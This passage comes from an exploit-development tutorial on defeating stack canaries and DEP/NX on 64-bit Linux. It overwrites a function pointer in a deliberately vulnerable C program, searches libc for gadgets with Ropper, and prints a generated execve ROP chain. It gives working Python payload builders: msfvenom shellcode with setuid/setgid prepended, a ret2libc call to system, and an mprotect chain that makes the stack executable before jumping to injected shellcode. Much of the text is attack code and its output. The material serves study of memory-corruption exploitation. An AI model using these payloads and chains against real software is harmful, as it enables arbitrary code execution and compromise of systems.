        .read = ( bShouldRead ) ? buf_read : NULL
    };
}

void main(int argc, char **argv) {
    Buffer buf = buf_new( (bool)(argc > 1 && strcmp(argv[1], "-r") == 0) );
    char *cpLine = NULL;
    size_t n = 0;

    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );

    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf.write( &buf, cpLine, n );

    if ( buf.read )
        buf.read( &buf );
}

This example is very similar to the previous one, except that in this the Buffer structure has additional members that hold pointers to its associated functions, and during initialization in the buf_new function, the addresses of those functions are assigned to the structure instance.

┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
                                                                                                                                                         
┌──(user㉿host)-[~]
└─$ ./test -r
Data: Hello World!
Your Data :
Hello World!

Notice that the read function pointer is within reach of our overflow. It is only called when it is not NULL, which the -r option ensures (although, since our overflow replaces it with a non-NULL address, the call would happen even without -r). It is called before the canary check, allowing us to preempt the protection, hijack the program execution flow, and execute our own code.
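The 80 bytes of filler in the payload script are simply the offset of the read member. ctypes can compute it using the platform’s native C alignment rules. This sketch mirrors struct _Buffer with the function pointers modeled as void pointers and assumes a 64-bit x86-64 Linux host (other ABIs may lay it out differently); SHELLCODE_ADDR reuses the author’s hard-coded, ASLR-off address.

```python
import ctypes
import struct


class Buffer(ctypes.Structure):
    # Mirrors struct _Buffer; the two function pointers are modeled as void *
    _fields_ = [
        ("data", ctypes.c_char * 64),
        ("nSize", ctypes.c_int),
        ("write", ctypes.c_void_p),
        ("read", ctypes.c_void_p),
    ]


print(Buffer.nSize.offset, Buffer.write.offset, Buffer.read.offset, ctypes.sizeof(Buffer))
# x86-64 Linux: 64 72 80 88 (4 bytes of padding after nSize)

SHELLCODE_ADDR = 0x7FFFFFFFDD70 + 0x40  # author's hard-coded address, ASLR off
payload = b"A" * Buffer.read.offset + struct.pack("<Q", SHELLCODE_ADDR)
```

Note that the filler also overwrites the write pointer, which is harmless because buf.write is only called once, before the overflow happens.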

As we said before, the function pointer we control gets called before the canary check. We can abuse it by pointing it at our shellcode.

#!/usr/bin/python3

import struct

# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true PrependSetuid=true PrependSetgid=true CMD=id
buf =  b""
buf += b"\x48\x31\xff\x6a\x69\x58\x0f\x05\x48\x31\xff\x6a"
buf += b"\x6a\x58\x0f\x05\x48\xb8\x2f\x62\x69\x6e\x2f\x73"
buf += b"\x68\x00\x99\x50\x54\x5f\x52\x66\x68\x2d\x63\x54"
buf += b"\x5e\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x56\x57"
buf += b"\x54\x5e\x6a\x3b\x58\x0f\x05\x48\x31\xff\x6a\x3c"
buf += b"\x58\x0f\x05"

with open("payload", "wb") as f:
    f.write( b"A" * 80 )                                 # Fills data, nSize ( + padding ) and the write pointer
    f.write( struct.pack("<Q", 0x7fffffffdd70 + 0x40) )  # Function Pointer
    f.write( b"\x90" * 0x80 )                            # NOPs for padding
    f.write( buf )                                       # Shellcode

Okay, everything is in order, let’s shoot.

Other Strategies

Not all operating systems and compilers are created equal, and not all canary protection implementations are the same. Sometimes, they may be weak and improperly implemented, allowing them to be bypassed. Here are some of the shortcomings and how they can be exploited to bypass them:

  1. Static Canary/Cookie: Sometimes, the value of the secret canary is fixed and does not change between runs of the program. In this case, we can simply write the known value back in its place, so the check at the end of the function passes and the protection is broken.

  2. Weak Canary/Cookie: Sometimes, the value of the secret canary changes, but not completely. Only a small fraction of it changes each time the program runs. In this case, we can guess the canary value and then force the program to run several times until we encounter the correct value.

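  3. Not All Buffers Are Protected: Compilers don’t instrument every function. With GCC’s -fstack-protector, for example, only functions with character buffers above a small size threshold (--param ssp-buffer-size, 8 bytes by default) or that call alloca get a canary; -fstack-protector-strong and -fstack-protector-all widen the coverage. When the vulnerable function doesn’t qualify, another exploitation opportunity arises.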

  4. Overwritable Canary/Cookie: In Windows, for example, the master cookie (__security_cookie) lives in the data section of the PE image in memory. If we can write anything anywhere in memory, we can change it to a value we know. For example, an instruction such as mov qword ptr [RegisterA], RegisterB copies data from register B into the memory referenced by register A. If we can control both registers, we can replace the original canary.
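For the weak-canary case, the cost of guessing is easy to estimate. A sketch, assuming a fresh canary on every run with k unpredictable bits and an attacker who always submits the same guess, so each run is an independent trial with success probability 2^-k (a geometric distribution); both helper names are hypothetical.

```python
def expected_runs(random_bits: int) -> int:
    """Mean number of runs until a fixed guess matches (mean of a geometric distribution)."""
    return 2 ** random_bits


def success_probability(random_bits: int, runs: int) -> float:
    """Chance that at least one of `runs` independent attempts hits the canary."""
    p = 1 / 2 ** random_bits
    return 1 - (1 - p) ** runs


for bits in (8, 16, 24):
    print(bits, expected_runs(bits), round(success_probability(bits, 1000), 4))
```

With only 8 random bits, a thousand runs almost always succeed; with 24 bits, they almost never do.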

DEP / NX == No More Direct Code Execution

In this and previous articles, we’ve always relied on hijacking the flow of program execution by injecting malicious code onto the stack and forcing the program to execute it. This protection is designed specifically to prevent that. Even if an exploit bypasses the canary and gains control of the instruction pointer, the injected code will not be executed: as soon as the processor tries to fetch instructions from a non-executable stack page, it raises a page fault, informing the operating system that something abnormal has occurred. The system then raises an access violation exception (SIGSEGV on Linux) and terminates the process.

DEP stands for Data Execution Prevention, and it mainly works in two modes:

  1. Hardware Level Support: hardware-enforced DEP for CPUs that can mark memory pages as Non-eXecutable (NX bit). In this mode, the processor itself can prevent the execution of any code from memory pages that are not supposed to be executed.

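  2. Software Level Support: Software-enforced DEP is the fallback for CPUs that lack hardware support. In this mode, the operating system itself provides the protection, but in a much narrower form: on Windows, it mainly validates exception handlers to stop malicious code from abusing the exception-handling mechanism, rather than blocking execution from data pages.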

On Windows, this feature is configured at boot: the system-wide policy is the No-eXecute (NX) setting stored in the Boot Configuration Data, and depending on that policy, an application may be able to change the DEP setting for its own process. There is more than one mode:

  1. Opt-In: DEP is enabled only for operating system components, including the Windows kernel and drivers, and for programs that administrators have explicitly selected in the DEP configuration.

  2. Opt-Out: DEP is enabled for all programs and services except those in the exception list. If a particular program is not in the exceptions list, then DEP is enabled for that program.

  3. AlwaysOn: In this mode, DEP is enabled for all processes without any exceptions and cannot be turned off at runtime.

  4. AlwaysOff: This mode is the opposite of AlwaysOn, as DEP is disabled for all processes and cannot be turned on at runtime.
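You can check which of these modes a Windows machine is currently using by calling the documented kernel32 function GetSystemDEPPolicy through Python's ctypes. Its return values 0 to 3 correspond to AlwaysOff, AlwaysOn, OptIn, and OptOut. The following is a minimal sketch. The helper name system_dep_policy is hypothetical, and on non-Windows systems it simply returns None.

```python
import ctypes
import sys

# Return values of kernel32!GetSystemDEPPolicy (DEP_SYSTEM_POLICY_TYPE)
DEP_POLICY_NAMES = {0: "AlwaysOff", 1: "AlwaysOn", 2: "OptIn", 3: "OptOut"}

def system_dep_policy():
    """Return the system-wide DEP mode name, or None when not running on Windows."""
    if sys.platform != "win32":
        return None
    kernel32 = ctypes.WinDLL("kernel32")          # only exists on Windows builds of ctypes
    kernel32.GetSystemDEPPolicy.restype = ctypes.c_int
    return DEP_POLICY_NAMES.get(kernel32.GetSystemDEPPolicy(), "Unknown")

print("System DEP policy:", system_dep_policy())
```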

Each executable binary file describes its sections and the permissions they require, such as read, write, and execute. In Windows PE files, for example, _IMAGE_SECTION_HEADER.Characteristics holds the permissions a section requires in memory. If the IMAGE_SCN_MEM_EXECUTE flag is set, the loader maps that section's pages without the No-eXecute bit. ELF files work similarly: ElfN_Shdr.sh_flags describes each section, and the SHF_EXECINSTR flag marks a section as containing executable instructions. Note, however, that the ELF loader maps memory according to the program headers (segments), not the sections. The permissions actually applied therefore come from ElfN_Phdr.p_flags (PF_R, PF_W, PF_X).

When we build code, the compiler and linker assign each section and segment the permissions it needs once loaded into memory. That is why we used the -zexecstack option. This linker option (passed through by the compiler) marks the stack as executable in the binary's PT_GNU_STACK program header, so the operating system maps the stack pages as executable when it loads the binary. By default, however, the stack is only readable and writable, not executable.
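On Linux, the stack's permissions are recorded in the binary's PT_GNU_STACK program header, which is what the -zexecstack linker option changes. You can inspect it directly, as readelf -l does. The sketch below assumes a 64-bit little-endian ELF file. It walks the program header table and reports the flags of the PT_GNU_STACK entry. The function names are hypothetical.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551          # program header type that carries the stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # segment permission bits in p_flags

def gnu_stack_flags(elf: bytes):
    """Return p_flags of the PT_GNU_STACK header, or None if the binary has none."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("this sketch only handles 64-bit little-endian ELF files")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)             # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)  # entry size and entry count
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return p_flags
    return None

def perms(flags: int) -> str:
    """Render p_flags as an 'rwx'-style string, e.g. 'rw-' for a non-executable stack."""
    return "".join(ch if flags & bit else "-" for ch, bit in (("r", PF_R), ("w", PF_W), ("x", PF_X)))

if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as f:
        flags = gnu_stack_flags(f.read())
    print("no PT_GNU_STACK header" if flags is None else "stack: " + perms(flags))
```

If you run it against the example binary built with and without -zexecstack, you should see the stack flip between rwx and rw-.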

Return Oriented Programming ( ROP )

Yes, we cannot redirect execution to the stack because this protection will prevent us, but we can still redirect execution to executable memory, for example, the executable section of the program itself and the libraries and modules loaded in the process address space. Let me explain more to you.

Any computer program works as follows. The processor executes instructions sequentially. When it reaches a return instruction (ret), it pops the return address previously saved on the stack into the instruction pointer and continues executing the instructions at that address. Every subsequent ret does the same.

We can exploit this by overwriting the saved return address so that the program jumps to one or more instructions followed by a return instruction (a ROP gadget). When that ret executes, it pops the next value we planted on the stack: a fake address pointing to another gadget, and so on. We keep chaining gadgets this way until we achieve the desired result.

A ROP gadget can be defined as one or more instructions followed by a return instruction located somewhere in a library, module, or executable section of the program itself. It can be used in sequence with other ROP gadgets to achieve a specific goal; this is called a ROP chain.
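Here is a toy model in Python that makes the ret-driven chaining concrete. It is not real machine code. The "stack" is a list of 64-bit values, each gadget is a Python function standing in for a few instructions, and every ret simply pops the next value and jumps to the gadget at that address. The addresses and the fake_system gadget are hypothetical.

```python
def pop(reg):
    """Build a toy 'pop <reg>; ret' gadget."""
    def gadget(regs, stack, sp, trace):
        regs[reg] = stack[sp]                     # pop <reg>: consume one stack slot
        trace.append(f"pop {reg} <- {stack[sp]:#x}")
        return sp + 1                             # the following ret consumes the next slot
    return gadget

def fake_system(regs, stack, sp, trace):
    """Hypothetical stand-in for a call to system(rdi)."""
    trace.append(f"system({regs['rdi']:#x})")
    return sp

def run_chain(stack, gadgets):
    """Simulate a ROP chain: each 'ret' pops an address and runs the gadget found there."""
    regs, trace, sp = {}, [], 0
    while sp < len(stack):
        addr = stack[sp]                          # ret: pop the next return address into RIP
        sp = gadgets[addr](regs, stack, sp + 1, trace)
    return regs, trace

gadgets = {0x401000: pop("rdi"), 0x402000: fake_system}
chain = [0x401000, 0xDEADBEEF, 0x402000]          # pop rdi; ret | argument | "system"
regs, trace = run_chain(chain, gadgets)
print(trace)  # ['pop rdi <- 0xdeadbeef', 'system(0xdeadbeef)']
```

Note how the argument sits in the slot right after the gadget address. The gadget's pop consumes it, so the next ret lands on the following gadget.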

There are many tools for hunting the ROP gadgets we need. One of them is an amazing tool called Ropper, which provides many of the features we need for return-oriented programming. For example, to hunt for ROP gadgets in libc:

┌──(user㉿host)-[~]
└─$ ropper
(ropper)> file /usr/lib/x86_64-linux-gnu/libc.so.6
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(libc.so.6/ELF/x86_64)> 

We run the tool and load the target file with the file command, as shown.

We can list all ROP gadgets in that file with the gadgets command, as shown in the picture above. We can also easily hunt for specific gadgets with the search command:

(libc.so.6/ELF/x86_64)> search pop rdi
[INFO] Searching for gadgets: pop rdi

[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x0000000000059c05: pop rdi; adc eax, 0xe762e800; std; jmp qword ptr [rsi - 0x70]; 
0x000000000017cd88: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rdi], ah; ret; 
0x0000000000179ec8: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rsi], ah; ret; 
0x00000000000d7a01: pop rdi; add byte ptr [rax], al; add byte ptr [rdi + rcx + 0x45], al; fsubr st(1); ret 0xfff0; 
0x000000000011e7a2: pop rdi; add ebx, ebp; lahf; xor eax, eax; ret; 
0x000000000016b267: pop rdi; add rax, rdi; shr rax, 2; vzeroupper; ret; 
0x0000000000165b47: pop rdi; add rax, rdi; vzeroupper; ret; 
0x000000000016c935: pop rdi; add rdi, 0x21; add rax, rdi; vzeroupper; ret; 
0x000000000011072d: pop rdi; call rax; 
0x000000000011072d: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall; 
0x00000000000f43ad: pop rdi; cmp eax, 0x8948fff3; ret 0x448b; 
0x000000000016a927: pop rdi; cmp esi, dword ptr [rdi + rax]; jne 0x16a934; add rax, rdi; vzeroupper; ret; 
0x00000000001671db: pop rdi; cmp sil, byte ptr [rdi + rax]; jne 0x1671e9; add rax, rdi; vzeroupper; ret; 
0x000000000002d13c: pop rdi; jmp rax; 
0x0000000000054968: pop rdi; mov dword ptr [rdi], 0; mov eax, 2; ret; 
0x00000000000f9a10: pop rdi; mov eax, 0x3a; syscall; 
0x0000000000100a1a: pop rdi; or al, ch; iretd; jns 0x100a12; jmp qword ptr [rsi - 0x7d]; 
0x0000000000100b60: pop rdi; or byte ptr [rax - 0x77], cl; pop rbp; add al, ch; test dword ptr [rax - 0xe], edi; jmp qword ptr [rsi - 0x7d]; 
0x0000000000110e0c: pop rdi; or eax, 0x64d8f700; mov dword ptr [rdx], eax; mov eax, 0xffffffff; ret; 
0x00000000001420d2: pop rdi; out dx, al; dec dword ptr [rax - 0x77]; ret 0x8548; 
0x000000000002a3fc: pop rdi; pop rbp; ret; 
0x000000000015e700: pop rdi; cli; dec dword ptr [rax - 0x39]; ret 0xffff; 
0x000000000002a205: pop rdi; ret;

The tool has collected all the gadgets related to the instruction we are looking for (pop rdi). We can also make the search more general.
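Under the hood, a gadget is just a byte sequence that decodes to the instructions we want and ends in a ret. Tools like Ropper automate this by disassembling backwards from every ret and handling far more instruction forms. As a rough sketch of the idea, the snippet below searches a file for the raw encodings of a few "pop <reg>; ret" gadgets. Keep three caveats in mind:

* It scans the whole file, including non-executable data, so hits must still be filtered against executable segments.
* The results are file offsets. They match the addresses Ropper prints only if the executable segment's file offset equals its virtual address, which you should verify with readelf -l.
* The gadget table and helper names are hypothetical.

```python
import sys

# Raw x86-64 encodings: "pop <reg>" is 0x58 + register number (REX.B prefix 0x41 for r8-r15), ret is 0xC3
GADGETS = {
    "pop rax; ret": b"\x58\xc3",
    "pop rdx; ret": b"\x5a\xc3",
    "pop rsi; ret": b"\x5e\xc3",
    "pop rdi; ret": b"\x5f\xc3",
    "pop r8; ret": b"\x41\x58\xc3",
    "syscall; ret": b"\x0f\x05\xc3",
}

def find_all(data: bytes, pattern: bytes):
    """Return every offset at which pattern occurs, including overlapping and unaligned hits."""
    offsets, start = [], data.find(pattern)
    while start != -1:
        offsets.append(start)
        start = data.find(pattern, start + 1)
    return offsets

if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as f:
        blob = f.read()
    for name, pattern in GADGETS.items():
        hits = find_all(blob, pattern)
        print(f"{name:14} {len(hits):6} hits, first: {hex(hits[0]) if hits else '-'}")
```

Because x86 instructions have variable length, the "pop rax; ret" bytes also appear inside every "pop r8; ret". Jumping into the middle of an instruction like this is a common source of useful gadgets.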

(libc.so.6/ELF/x86_64)> search mov [rbx + 0x40],%
[INFO] Searching for gadgets: mov [rbx + 0x40],%

[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x00000000000a3bcf: mov dword ptr [rbx + 0x40], eax; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;                                                                                                                                    
0x00000000001161f5: mov dword ptr [rbx + 0x40], eax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret; 
0x000000000003fa47: mov dword ptr [rbx + 0x40], esi; pop rbx; ret; 
0x000000000003fa28: mov dword ptr [rbx + 0x40], esi; xor eax, eax; pop rbx; ret; 
0x000000000008ba03: mov dword ptr [rbx + 0x40], esp; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret; 
0x000000000008be8e: mov dword ptr [rbx + 0x40], esp; pop rbx; pop rbp; pop r12; ret; 
0x000000000008ba02: mov qword ptr [rbx + 0x40], r12; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret; 
0x000000000008be8d: mov qword ptr [rbx + 0x40], r12; pop rbx; pop rbp; pop r12; ret; 
0x00000000000a3bce: mov qword ptr [rbx + 0x40], r8; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;                                                                                                                                     
0x00000000001161f4: mov qword ptr [rbx + 0x40], rax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret; 

As you can see, we made the tool search for any mov instruction that writes to memory at [rbx + 0x40], regardless of the source operand (the % acts as a wildcard). This is very useful because we won't always find gadgets that do exactly what we want. The alternative is to combine different instructions that achieve the same result indirectly. The tool also provides an amazing feature that builds fully ready-to-use ROP chains for us.

(libc.so.6/ELF/x86_64)> ropchain execve cmd=id

[INFO] ROPchain Generator for syscall execve:


[INFO] 
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null


[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO] 

[INFO] Look for syscall gadget

[INFO] syscall gadget found
[INFO] generating rop chain
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000000000 # 2f1f84e0f4df64e0eb1829fabd8720136456dc4efce9962cb1188f8d436e30b0
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret; 
rop += '//////id'
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret; 
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000003c714) # 0x000000000003c714: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002aa5f) # 0x000000000002aa5f: pop rbx; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000005e961) # 0x000000000005e961: mov qword ptr [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002a205) # 0x000000000002a205: pop rdi; ret; 
rop += rebase_0(0x00000000001e7000)
rop += rebase_0(0x000000000002bb39) # 0x000000000002bb39: pop rsi; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x000000000010d37d) # 0x000000000010d37d: pop rdx; ret; 
rop += rebase_0(0x00000000001e7008)
rop += rebase_0(0x0000000000043067) # 0x0000000000043067: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000008ed72) # 0x000000000008ed72: syscall; ret; 
print(rop)
[INFO] rop chain generated!

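As you can see, the tool created a full ROP chain for us. It writes the command string into libc's data section and then invokes the execve system call (number 0x3b) on it. All we need to do is set the variable IMAGE_BASE_0 to the libc base address at runtime. Note that the generated script uses Python 2 string semantics. Under Python 3, rop and the '//////id' literal must be bytes, because pack() returns bytes. Unfortunately, this feature is very limited. The tool cannot create chains for everything we need, and it isn't completely reliable, since cases vary from program to program and from one bug to another.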
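For reference, here is the same chain rewritten as a Python 3 sketch. It uses bytes throughout and is rebased from a libc base address supplied at runtime. The offsets are copied from the Ropper output above, so they are only valid for that exact libc build. The function name build_execve_chain is hypothetical.

```python
import struct

def q(value: int) -> bytes:
    """Pack one little-endian 64-bit stack slot."""
    return struct.pack("<Q", value)

def build_execve_chain(libc_base: int) -> bytes:
    r = lambda off: q(libc_base + off)       # rebase a libc offset
    junk = q(0xDEADBEEFDEADBEEF) * 4         # consumed by: pop rbx; pop rbp; pop r12; pop r13
    chain = b""
    chain += r(0x3C714) + b"//////id"        # pop r13; ret          -> r13 = "//////id"
    chain += r(0x2AA5F) + r(0x1E7000)        # pop rbx; ret          -> rbx = writable libc address
    chain += r(0x5E961) + junk               # mov [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret
    chain += r(0x3C714) + q(0)               # pop r13; ret          -> r13 = 0
    chain += r(0x2AA5F) + r(0x1E7008)        # pop rbx; ret          -> rbx = address right after the string
    chain += r(0x5E961) + junk               # terminates the string and doubles as an empty argv/envp array
    chain += r(0x2A205) + r(0x1E7000)        # pop rdi; ret          -> pathname
    chain += r(0x2BB39) + r(0x1E7008)        # pop rsi; ret          -> argv
    chain += r(0x10D37D) + r(0x1E7008)       # pop rdx; ret          -> envp
    chain += r(0x43067) + q(0x3B)            # pop rax; ret          -> SYS_execve
    chain += r(0x8ED72)                      # syscall; ret
    return chain

print(len(build_execve_chain(0x7FFFF7DAE000)), "bytes")
```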

Return To Libc ( ret2libc )

Let’s practice on the first example presented in this blog and this time we will not compile it using the -zexecstack option.

Notice that the first time we compiled with the -zexecstack option, the exploitation succeeded, and the shellcode executed successfully, but the second time, when we did not use that option, the exploitation failed, and the shellcode did not execute.

We need to change our code execution strategy. Instead of making the program jump to code injected into the stack, we make it return into libc and run the system function, which lets us run commands on the system. system takes exactly one argument: a pointer to a null-terminated command string. According to the Linux x86-64 calling convention, the first argument of a function call is passed in the rdi register. So we need a ROP gadget that loads our command's address into rdi. Once this gadget returns, the next saved instruction pointer should be another gadget that calls system.

Great. Using PEDA's searchmem command, we found the string "id" inside the C library. We will use it as the argument to system.

gdb-peda$ x/s 0x7ffff7f5a078
0x7ffff7f5a078: "id"
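system only needs a pointer to bytes that end with a NUL. The string therefore does not have to stand alone: the tail of a longer string such as "...id\0" works just as well. The following is a minimal sketch of such a search over a file's bytes. It is a rough stand-in for PEDA's searchmem, which searches the live process memory instead. It assumes that file offsets can be turned into addresses by adding the libc base, which holds only where a segment's file offset equals its virtual address. The helper name find_cstring is hypothetical.

```python
import sys

def find_cstring(data: bytes, s: bytes):
    """Return offsets where s appears immediately followed by a NUL terminator."""
    needle = s + b"\x00"
    hits, pos = [], data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits

if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as f:
        print([hex(off) for off in find_cstring(f.read(), b"id")[:5]])
```

For example, "uid\0" contains a usable "id\0" starting one byte in.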

Okay, now we need a ROP gadget that loads this pointer into the RDI register. A typical one is pop rdi; ret. We overwrite the saved instruction pointer with the address of that gadget and place the command string's address right after it. Now we're ready to call system.

We follow the same approach: we place the address of system on the stack, load it into RAX with a pop rax; ret gadget, and then use a call rax gadget. However, once system finishes and returns, execution continues at whatever instructions follow the call rax gadget. We don't control those instructions, so the process would crash. We must therefore call exit afterward to close the program properly.

Fortunately, I found a gadget that calls a register (call rax) and then calls exit by itself, passing system's return value as the exit status, so we don't have to do it ourselves.

(gdb) x/3i 0x7ffff7dd7d66 
   0x7ffff7dd7d66 <__libc_start_call_main+118>: call   *%rax
   0x7ffff7dd7d68 <__libc_start_call_main+120>: mov    %eax,%edi
   0x7ffff7dd7d6a <__libc_start_call_main+122>: call   0x7ffff7df0280 <__GI_exit>
(gdb) 

We build our ROP chain as follows:

import struct
from subprocess import Popen

def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += struct.pack( "<Q", 0x7ffff7f5a078 )        # The command address ( id )
    payload += struct.pack( "<Q", 0x7ffff7df1067 )        # pop rax; ret
    payload += struct.pack( "<Q", 0x7ffff7e008f0 )        # system function address
    payload += struct.pack( "<Q", 0x7ffff7dd7d66 )        # call rax ; system( "id" ); exit( system's return value )

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s try this strategy against the program and see if it works.

Force Disable DEP Protection & Execute Arbitrary Code

Operating systems provide low-level APIs that allow us to modify the permissions of memory pages at runtime. Windows, for example, provides an API called VirtualProtect and an even lower-level native API called NtProtectVirtualMemory that does this. On the other hand, Unix-based systems provide similar APIs that accomplish the same task, such as mprotect. These facts can be abused to force the targeted program to execute our evil instructions.

We can abuse the mprotect function to make the stack executable and then force the program to execute instructions injected into the stack. The mprotect declaration is as follows:

int mprotect(void addr[.size], size_t size, int prot);

It takes exactly three parameters:

  1. addr: The starting address of the memory region, which must be aligned to the page boundary.
  2. size: The length in bytes of the address range.
  3. prot: The desired access protection, such as PROT_READ, PROT_WRITE, and PROT_EXEC.
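Because mprotect works on whole pages, a ROP chain must pass a page-aligned start address and a size that covers every byte of the shellcode. A fixed size of one page is only enough if the shellcode does not cross into the next page. The following is a minimal sketch of that arithmetic. It assumes 4 KiB pages, as on typical x86-64 Linux, and uses the Linux PROT_* values (PROT_READ is 0x1 and PROT_EXEC is 0x4). The helper name mprotect_range is hypothetical.

```python
PAGE_SIZE = 0x1000                                # assumption: 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4  # Linux values

def mprotect_range(addr: int, length: int, page_size: int = PAGE_SIZE):
    """Return (start, size) for mprotect so that [addr, addr + length) is fully covered."""
    start = addr & ~(page_size - 1)                           # round the start down to a page
    end = (addr + length + page_size - 1) & ~(page_size - 1)  # round the end up to a page
    return start, end - start

start, size = mprotect_range(0x7fffffffddb0 + 0x40, 0x100)
print(hex(start), hex(size), hex(PROT_READ | PROT_WRITE | PROT_EXEC))  # 0x7fffffffd000 0x1000 0x7
```

Shift the same 0x100-byte shellcode to start 0x10 bytes before a page boundary and the required size grows to 0x2000.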

According to the Linux x64 calling convention, the three parameters must be passed through the RDI, RSI, and RDX registers. We need to build a ROP chain that performs the following:

  1. Load a page-aligned stack address into RDI by writing that address onto the stack and retrieving it with a pop gadget (pop rdi; ret).
  2. Load the desired size into RSI by writing it onto the stack and retrieving it with a pop gadget (pop rsi; ret).
  3. Load the desired protection flags into RDX by writing them onto the stack and retrieving them with a pop gadget (pop rdx; ret).
  4. Put the address of mprotect on the stack as a return address so that the program jumps directly into it.
  5. Put the shellcode address right after the mprotect address so that it gets executed once the function returns.

def hijack_exec(p: Popen, canary):
    shellcode = 0x7fffffffddb0 + 0x40                     # Shellcode Address
    stack_page = shellcode & 0xfffffffffffff000           # Align the address to the page boundary.
    payload = b""
    payload += b"A" * 0x112                               # Fills the stack frame
    payload += struct.pack( "<Q", canary )                # Places the correct canary value 
    payload += b"B" * 0x8                                 # Base pointer
    payload += struct.pack( "<Q", 0x7ffff7dd8205 )        # pop rdi; ret
    payload += struct.pack( "<Q", stack_page )            # The aligned stack page address
    payload += struct.pack( "<Q", 0x7ffff7dd9b39 )        # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 )                # Page size 
    payload += struct.pack( "<Q", 0x7ffff7ebb37d )        # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 )    # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", 0x7ffff7ebb200 )        # mprotect function address
    payload += struct.pack( "<Q", shellcode )             # Jump into shellcode
    payload += b"\x90" * 0x40                             # NOPs for padding
    payload += buf                                        # Shellcode

    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()

Let’s run this exploitation strategy and see what happens.

Alternatively, on Windows, it is possible to use functions like NtSetInformationProcess and SetProcessDEPPolicy to disable this protection and make memory executable, depending on the configured DEP mode. Unix-based systems offer a similar trick. We can call a low-level API named personality with the READ_IMPLIES_EXEC flag, which makes memory mapped afterward executable even if it was not mapped with execute permission. This does not affect memory that was already mapped, such as previously created heaps.
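On Linux, you can inspect the current personality without changing it, because calling personality(0xffffffff) only queries the value. The following is a minimal sketch via ctypes. It assumes the C library exports the personality wrapper, as glibc does, and uses the READ_IMPLIES_EXEC value 0x0400000 from <linux/personality.h>. The helper names are hypothetical.

```python
import ctypes
import sys

READ_IMPLIES_EXEC = 0x0400000   # from <linux/personality.h>
QUERY_PERSONA = 0xFFFFFFFF      # this argument returns the current persona without changing it

def current_personality():
    """Return this process's personality flags, or None when not running on Linux."""
    if not sys.platform.startswith("linux"):
        return None
    libc = ctypes.CDLL(None, use_errno=True)
    libc.personality.argtypes = [ctypes.c_ulong]   # int personality(unsigned long persona)
    libc.personality.restype = ctypes.c_int
    return libc.personality(QUERY_PERSONA)

def implies_exec(persona: int) -> bool:
    return bool(persona & READ_IMPLIES_EXEC)

persona = current_personality()
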